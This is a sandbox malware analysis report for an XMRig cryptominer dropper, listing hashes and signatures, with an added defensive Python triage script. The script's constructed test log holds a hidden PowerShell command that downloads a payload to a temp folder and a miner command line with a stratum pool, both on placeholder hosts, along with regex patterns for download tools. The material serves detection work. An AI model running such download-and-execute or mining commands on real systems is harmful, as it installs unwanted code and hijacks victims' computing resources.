General

  • Target

    27ba0bd4ae29c0f2eec63ee434860f90_NeikiAnalytics.exe

  • Size

    1.6MB

  • Sample

    240525-n1nr9age56

  • MD5

    27ba0bd4ae29c0f2eec63ee434860f90

  • SHA1

    9a3323febf34039966ecea42c915719d3f82a6b3

  • SHA256

    8f2f894715de4a4a66bf9eee85e9d8d86f21aaf8f3bc82e3b3b05bcf5d439cee

  • SHA512

    cde602e8da3405ef11c3873a75b1a5b05fc4462b201e691c54b29895ab3e2dc4b111bae9a668a4a9a11cf3ca538d3a18ab8e8d92f39095a0951ddbdd64cab7a5

  • SSDEEP

    24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsZLHYm2WVDuu:Lz071uv4BPMkFfdg6NsNtJVN

Malware Config

Targets

    • Target

      27ba0bd4ae29c0f2eec63ee434860f90_NeikiAnalytics.exe

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest used to fetch content from the network.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX or with a modified build of the UPX open-source packer.

    • Legitimate hosting services abused for malware hosting/C2
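
The report gives the sample's digests and the sandbox signatures that fired on it (UPX packing, a PowerShell Invoke-WebRequest download, dropped executables, an XMRig payload). The script below is an added example, not part of the report and not the sandbox's own detection code. It shows how a practitioner reproduces three of those checks offline: confirming that a file's hashes agree with the ones listed before trusting it is the analysed sample, reading PE section names to recognise stock UPX packing (and the "UPX!" magic that survives when a custom build renames the sections), and flagging PowerShell download command lines and miner-style arguments in process-creation records. The minimal PE built by build_fake_pe(), the log lines and every host name in them are constructed test data, not indicators from this analysis.

```python
"""Offline triage helpers accompanying the sandbox report (added example)."""
import hashlib
import re
import struct

# Digests copied from the report's General section.
REPORT_HASHES = {
    "md5": "27ba0bd4ae29c0f2eec63ee434860f90",
    "sha1": "9a3323febf34039966ecea42c915719d3f82a6b3",
    "sha256": "8f2f894715de4a4a66bf9eee85e9d8d86f21aaf8f3bc82e3b3b05bcf5d439cee",
}


def digests(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256/SHA-512 of a buffer, keyed by hashlib algorithm name."""
    return {alg: hashlib.new(alg, data).hexdigest()
            for alg in ("md5", "sha1", "sha256", "sha512")}


def matches_report(data: bytes, expected: dict = REPORT_HASHES) -> bool:
    """True only if every digest the report lists agrees with the buffer."""
    actual = digests(data)
    return all(actual[alg] == value.lower() for alg, value in expected.items())


# Section names written by stock UPX. Custom builds often rename them, so the
# "UPX!" magic in front of the packed data is checked as a fallback.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def pe_section_names(data: bytes) -> list:
    """Walk MZ -> e_lfanew -> PE signature -> COFF header -> section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        off = table + i * 40
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    """Static equivalent of the report's 'UPX packed file' signature."""
    if set(pe_section_names(data)) & UPX_SECTION_NAMES:
        return True
    return b"UPX!" in data


def build_fake_pe(section_names) -> bytes:
    """Construct a minimal, non-runnable PE image with the given section names."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    table = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + table


# PowerShell download primitives (iwr/wget/curl are built-in aliases of Invoke-WebRequest).
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.IGNORECASE)
PS_DOWNLOAD = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadString|DownloadFile|Net\.WebClient)",
    re.IGNORECASE,
)
# Command-line markers typical of CPU miners such as XMRig (pool URL scheme, donate flag).
MINER_MARKERS = (b"stratum+tcp://", b"stratum+ssl://", b"--donate-level", b"xmrig", b"randomx")


def flag_powershell_downloads(log_lines) -> list:
    """Return records where PowerShell is used to fetch something from the network."""
    return [ln for ln in log_lines if POWERSHELL.search(ln) and PS_DOWNLOAD.search(ln)]


def miner_indicators(data: bytes) -> list:
    """Return the miner markers present in a buffer (file contents or a command line)."""
    low = data.lower()
    return [m.decode() for m in MINER_MARKERS if m.lower() in low]


# Constructed process-creation records, "parent -> image: command line"; hosts are fake.
SAMPLE_LOG = [
    r'C:\x.exe -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: '
    r'powershell -nop -w hidden -c "Invoke-WebRequest -Uri https://files.example.invalid/p.bin '
    r'-OutFile $env:TEMP\p.exe"',
    r'C:\Windows\explorer.exe -> C:\Windows\System32\notepad.exe: notepad.exe C:\Users\u\notes.txt',
    r'C:\x.exe -> C:\Users\u\AppData\Local\Temp\p.exe: p.exe -o stratum+tcp://pool.example.invalid:3333 '
    r'--donate-level=1',
]

if __name__ == "__main__":
    packed = build_fake_pe(["UPX0", "UPX1", ".rsrc"])
    print("sections:", pe_section_names(packed), "upx:", looks_upx_packed(packed))
    print("matches report:", matches_report(packed))
    for hit in flag_powershell_downloads(SAMPLE_LOG):
        print("powershell download:", hit)
    print("miner markers:", miner_indicators(SAMPLE_LOG[2].encode()))
```

Run it against a real file with `matches_report(open(path, "rb").read())` first; if that returns False you are not looking at the sample this report describes, and none of the signature hits above should be assumed to apply.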

MITRE ATT&CK Enterprise v15

Tasks